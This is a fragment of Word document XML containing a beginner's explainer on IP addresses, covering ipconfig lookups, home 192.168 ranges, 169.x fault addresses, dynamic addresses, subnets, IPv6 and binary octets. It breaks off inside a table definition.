        <w:spacing w:after="0" w:line="312" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Checking your IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Checking your IP address is easy to do.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If you use Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> — Run a search on your computer for CMD. Once the command box is open, type "ipconfig" and hit enter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If you use a Mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> — Go to Applications &gt; Utilities &gt; Terminal. Once you're in Terminal, type "ipconfig" and hit enter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If you're at home in the UK, your IP should start with something 192.168. A typical example would be 192.168.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:before="750" w:after="120" w:line="312" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bad IPs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If your IP ever starts with 169. you won't be able to access the internet. A 169 address is your router or modem alerting you to a problem by giving you a bad IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If you're at work, get your IT people on it. If you're at home, the best thing to do is turn off and unplug your router for 30 seconds, then plug it back in and turn it on again. If you're connecting wirelessly, try a cable, and if that still doesn't work, phone your provider — there is a problem between your computer and your router.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:before="750" w:after="120" w:line="312" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IPv4, 192.168.0.1 and internet history</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPv4 was the first standard for IP addresses. 192.168.0.1 is a common example of an IPv4 address. The most recognisable IP addresses are in the range 192.168.0.1 to 192.168.0.255 because these tend to be the ones we use at home.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>An IP address is a sequence of four blocks of numbers. Each of these blocks is a value between 0 and 255, which means that each block has 256 possible values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>So with four blocks allowing for up 256 possible values, IPv4 allowed for around four billion unique addresses, which seemed like a huge amount. This was the early 1970s after all; computers weren't particularly widespread, and nobody could have foreseen the growth of the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fast forward to today and with six billion people in the world, millions of businesses and homes with multiple internet connections, four billion is nowhere near enough IP addresses to go around. We get around this in two ways: dynamic IP addresses and subnets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:before="750" w:after="120" w:line="312" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dynamic IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If everyone had their own IP address, things wouldn't work; we would have run out a long time ago. So internet providers assign IP addresses dynamically, which means that they are used in rotation. Not all IP addresses are always in use, so basically speaking, dynamic IP addresses just assign you the next free IP address instead of always giving you the same one. This means that when an IP address is not in use by one person, it can be used by another.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A static IP address is an IP address that never changes. These tend to be reserved for businesses, but for a small cost, your home provider can give you one, too.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:before="750" w:after="120" w:line="312" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Subnets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A subnet means sub-network, or a network within a network. Like </w:t>
      </w:r>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Inception</w:t>
      </w:r>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It basically splits up connections so IP addresses can be re-used. An example would be a house with five computers: Instead of five individual IP addresses for each machine, there is one main IP address assigned by the internet provider. This main IP address is assigned to the router, which then creates its own little network and gives all the devices IP addresses from there.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The problem is that we're still running out of addresses. Any device that connects to the internet needs an IP address to do so, and even with dynamics and subnets there aren't </w:t>
      </w:r>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>enough. Mobile phones, consoles, handhelds, TVs, computers, watches, GPS... all of these devices need IP addresses. We need a new standard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is where IPv6 comes in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:before="750" w:after="120" w:line="312" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPv6 uses a different system that allows for a lot more combinations. IPv6 uses a hexadecimal system instead of binary. Binary has two states, the values one or zero, but hexadecimal has 16, which are the values 0123456789ABCDEF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>An IPv6 address is eight groups of four in hex. An example address would be 1234:abcd:5678:efab:9012:cdef:3456:abcd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This allows for way, way more combinations than four billion. To be exact, IPv6 allows for 340 undecillion IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We probably won't need that many, so the IP address allocation problem is solved!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:before="750" w:after="120" w:line="312" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>More maths</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We're going to use 192.168.0.1 as an example here. IP addresses are all about binary. Each of the four blocks in an IP address represents a binary octet. WAIT! Don’t run away, this is easy!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11110000 is a binary octet, an octet because there are eight spaces, and binary because each of those spaces is either going to be a one or a zero. Any eight-digit sequence of ones and zeros is a binary octet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11111111 is an octet with a value of 255.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>00000000 is an octet with a value of 0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>So how do we work out the decimal value of an octet? It makes sense for eight zeros to have a value of zero, but how do eight ones equal 255? Each of the eight positions has a value attached — see the table below. Moving right to left, the first space has a value of one, the second two, the third four and upwards to 128.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9418" w:type="dxa"/>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68"/>
        <w:gridCol w:w="345"/>
        <w:gridCol w:w="668"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="669"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="669"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="503"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="503"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="503"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="503"/>
        <w:gridCol w:w="346"/>
        <w:gridCol w:w="381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00386EB9" w:rsidRPr="00F643F9" w:rsidTr="00386EB9">
